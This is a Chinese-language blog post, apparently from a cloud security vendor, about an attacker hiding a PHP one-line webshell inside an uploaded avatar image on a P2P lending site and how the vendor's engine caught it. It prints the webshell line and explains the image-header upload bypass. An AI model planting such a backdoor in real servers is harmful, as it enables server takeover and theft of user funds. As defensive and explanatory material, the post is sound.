安全圈的一位高人曾經說過,攻擊就是一種“魔術”。有趣的是,我在某p2p網貸平台上,還真看到了被憑空“變”出來的錢。
p2p貸款是當下一種比較友善和實用的融資手段,為很多中小融資者解決了燃眉之急。p2p普遍的模式是由中間人提供牽線搭橋的平台,一邊是有資金希望通過貸款讓别人擷取收益,另一邊是有借款需求的人,雙方通過中間人這個平台完成貸款交易。中間人一方面對雙方背景進行确認,另一方面保證借貸業務的安全進行。p2p網貸就是依托網絡即線上平台進行的p2p交易。
顯而易見,p2p貸款業務過程中,由于涉及金錢交易,安全是非常重要的:貸出的一方需要确認借貸一方是誠信和可靠的,而借貸的一方需要確定整個借貸過程的安全,可以踏踏實實地拿到自己所需的資金。是以,作為交易中間人的p2p平台能否保證交易的安全就顯得至關重要了。
一談到p2p貸款的安全,公衆的視線立刻就會被聚焦到交易雙方的安全上,能否安全地完成信貸交易是大家最關心的。然而,p2p業務中關鍵的中間方即交易平台利益的保護,往往被大家所忽略。特别是對于一個網貸平台來說,尤是如此。
交易平台怎麼可能利益受損?隻要不存在欺詐行為,也就是多掙點、少掙點手續費的問題啊!對于一個p2p網貸平台來說,在正常的網絡交易環境下,的确是這樣。然而,由于網貸平台交易的特殊性——引入網際網路絡這個因素,使得交易環境變得比較複雜,容易受到其他因素的影響。
在網際網路環境下的p2p網貸業務,和傳統線下業務不一樣的是,很可能出現除了交易雙方、中間平台之外的第四者——攻擊者。這個攻擊者不請自來,而且他趨利性的目的往往比p2p貸款業務中的其他三方都更強烈和不擇手段。
故事開始了。現在我們站在一個攻擊者的角度上看p2p網貸業務,p2p業務交易雙方固然是不錯的攻擊目标;然而,作為一個有經驗的黑客來說,他很可能會選擇中間人,即p2p網站平台。衆所周知,p2p網貸業務追求的最終目的是多赢。如果攻擊者摻合進來,就完全不同了——攻擊者一旦獲益,必然意味着正常p2p業務中的一方或多方利益受損。
平台業務中斷和使用者資訊洩漏可能是大家最容易想到的業務威脅。網站被ddos了,使用者資料庫被脫庫了,這樣的事件的确屢見報端。然而,p2p網貸平台是一個網際網路金融平台,通俗一點說,是玩兒錢的。黑客一旦選擇p2p網貸平台作為攻擊對象,其目标往往不再單純的是拒絕服務和使用者資訊的竊取,而是平台上的錢。
故事開始變得有意思了。安全圈有這麼一句著名的話:bad guy goes for where the money is (壞蛋總是跟着錢跑)。談到p2p平台上的錢,交易雙方賬戶裡的錢無疑是最大的目标。
沒錯,賬戶裡的錢。賬戶裡的錢就是誘惑,是一座金山。
我這裡有一個問題,賬戶裡的錢從哪裡來?這個貌似愚蠢的問題可能會被人笑話——當然是交易來的,要不就是充進去的,難道還是變出來的不成?
安全圈的一位高人曾經說過,攻擊就是一種“魔術”。如果攻擊者是一位“魔術師”呢?那麼這賬戶裡的錢怎麼就不能變出來?
有趣的是,我在某p2p網貸平台上,還真看到了被憑空“變”出來的錢。下面的内容可能有些枯燥,不過,我盡量用人類的語言把它講的通俗易懂。
如果我說上面的一大堆太空文字實際上一個圖檔,你會不會打我?不過,它的确是一個圖檔,那一大堆的亂碼是編碼後的圖檔代碼。這個圖檔是由某位“魔術師”上傳到某網貸平台上的頭像。
看到最上面那段簡短的文字了嗎——<?php @eval($_post['pass']);?>?稍微有些攻防基礎的同學定會開心一笑:這不就是木馬嗎?沒錯兒,一句話木馬。
這裡順帶普及一下什麼是木馬。木馬也叫後門,也稱webshell,“web”是指開放web服務的網站伺服器,“shell”意指黑客的目标,也就是取得對伺服器某種程度上的操作權限。webshell通常被稱為攻擊者通過端口擷取網站伺服器某種程度上的操作權限。webshell大多為動态腳本檔案,也被稱為網站後門工具。
我們上面看到的就是php木馬,精準一點說,php一句話圖檔馬。這個馬兒有什麼用呢?廢話少說,這個馬兒一旦被攻擊者上傳到web伺服器上,就可以幫助黑客獲得web伺服器控制權限。如果黑客通過這個馬兒讀取到資料庫的連接配接檔案,那麼,你的資料庫就是他的了。
故事到現在進入高潮。資料庫丢了,那就是使用者資訊洩漏了?拜托,對于一個p2p網貸網站,人家費那麼大勁(其實不用太費力氣)就是為了那些使用者資訊?當然不是,他可以随意修改自己賬戶的金額,1百,1千,1萬,10萬。。。然後轉賬或提現。
到了見證“奇迹”的時刻:攻擊者“變”出了錢,而網貸網站所有者最終要為這個“奇迹”埋單。在本文開始的時候,我們提到由于網際網路環境的特殊性,作為網貸平台的中間人利益可能因網絡攻擊而遭受損失。上面的故事即提供了真實寫照。
有的朋友會問,你這是在編故事嗎?還真不是。上面的圖檔是前不久在阿裡雲某網貸網站上截獲的真實馬兒。攻擊者自認為可以像繞過傳統防護系統一樣繞過阿裡雲的防護,上傳馬兒,不想卻被雲盾的伺服器防護引擎發現,立刻報警。然後,我們就得到了這個馬兒。之後,我們通過客服系統迅速通知了該網站的管理者,并提供了解決方案。
從攻擊角度上來說,在此次攻擊中,攻擊者最大的“亮點”是把木馬“放到”了圖檔裡。攻擊者這麼做的目的就是繞過防護。傳統的手段往往是對腳本代碼進行過濾和檢查,對于上傳的圖檔很難做内容核查,往往隻是通過檔案頭判斷是否是圖檔。如果通過檔案頭判斷是圖檔,那麼就預設放過。不想馬兒命途多舛,雲盾在伺服器系統層面的防護引擎憑借腳本防護規則準确發現并定位了這個木馬。
“魔術師”機關算盡,無奈馬兒最終沒能逃出雲盾的“手掌心”。p2p網貸網站所有者的利益得到了保護。
“魔術師和馬兒”的故事到這裡就要結束了。然而,攻擊者和防護者圍繞網際網路金融的攻防大戰卻剛剛開始。p2p網貸和網際網路金融正在迅猛發展,其間攻擊者與網站防護者之間的攻防博弈還将繼續。阿裡雲雲盾也将不斷面對攻擊者的挑戰。不過,這面經過十年打造的防護之盾必将在不斷進行的攻防大戰中變得更加牢固和強大。